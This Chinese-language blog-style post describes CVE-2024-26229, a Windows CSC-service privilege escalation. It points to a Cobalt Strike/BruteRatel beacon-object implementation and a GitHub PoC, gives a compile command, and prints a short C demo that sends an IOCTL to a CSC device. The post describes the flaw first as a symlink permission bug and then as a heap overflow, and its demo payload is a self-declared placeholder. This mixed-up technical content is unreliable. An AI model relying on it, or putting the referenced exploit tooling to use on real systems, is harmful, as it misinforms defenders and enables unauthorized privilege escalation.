省流：这个提权漏洞需要目标主机启用CSC服务，2008/2012没有这服务（无法利用），2016/2019/2022有该服务，但是默认都禁用了。但是据有些师傅说win10复现成功了。

漏洞阐述

CVE-2024-26229是一个影响Windows操作系统中的客户端缓存（CSC）服务的权限提升漏洞。CSC服务是负责管理离线文件或文件夹重定向的本地缓存的组件。这个漏洞允许潜在攻击者通过不当的文件操作和权限管理来访问敏感信息，修改或删除关键的系统文件，从而实现权限提升 (NVD)。

具体来说，这个漏洞涉及CSC服务在处理文件和文件夹的符号链接时的权限检查不足。攻击者可以通过创建恶意的符号链接，使得系统在处理这些链接时错误地授予文件访问权限。这可以允许攻击者执行代码或访问通常受保护的系统文件，从而获得更高的系统权限 (CVE CyberSecurity Database News)。

在技术分类上，此漏洞被标记为CWE-122，这代表它是一种基于堆的缓冲区溢出漏洞。在CVSS评分系统中，该漏洞的严重性评分为7.8，属于高危。

受影响版本详细列表

CVE-2024-26229 BOF

针对 Cobalt Strike 和 BruteRatel 的Beacon 对象文件 (BOF) 实现，由NVISO提供。

gcc -c CVE-2024-26229-bof.c -o CVE-2024-26229-bof.o

详细代码和编译方法可以在以下GitHub页面找到：NVISOsecurity/CVE-2024-26229-BOF

编译命令

gcc -c CVE-2024-26229-bof.c -o CVE-2024-26229-bof.o

CVE-2024-26229 poc exp

地址：https://github.com/varwara/CVE-2024-26229

CVE-2024-26229 POC Exploit

此部分提供了漏洞的利用代码，适用于环境 Windows 11 22H2 Build 22621。这是一个基本的概念验证演示（POC）代码，该代码展示了如何通过符号链接（Symlink）的方式利用该漏洞。

代码演示

以下是一个简化的演示代码段，用于说明攻击的基本原理：

#include <Windows.h>
#include <stdio.h>
​
int main() {
HANDLE hDevice = CreateFile("\\\\.\\CSCService", GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hDevice == INVALID_HANDLE_VALUE) {
printf("Failed to open device\n");
return 1;
}
​
DWORD bytesReturned;
char payload[100] = {0};  // 模拟的有效负载，需根据实际情况调整
BOOL status = DeviceIoControl(hDevice, 0x222000, payload, sizeof(payload), NULL, 0, &bytesReturned, NULL);
if (!status) {
printf("Exploit failed\n");
return 1;
}
​
printf("Exploit sent\n");
CloseHandle(hDevice);
return 0;
}

该代码尝试通过特定的IOCTL请求发送数据到Windows CSC服务，从而触发漏洞。请注意，这只是一个概念验证的例子，并且在实际情况中，攻击的细节可能有所不同。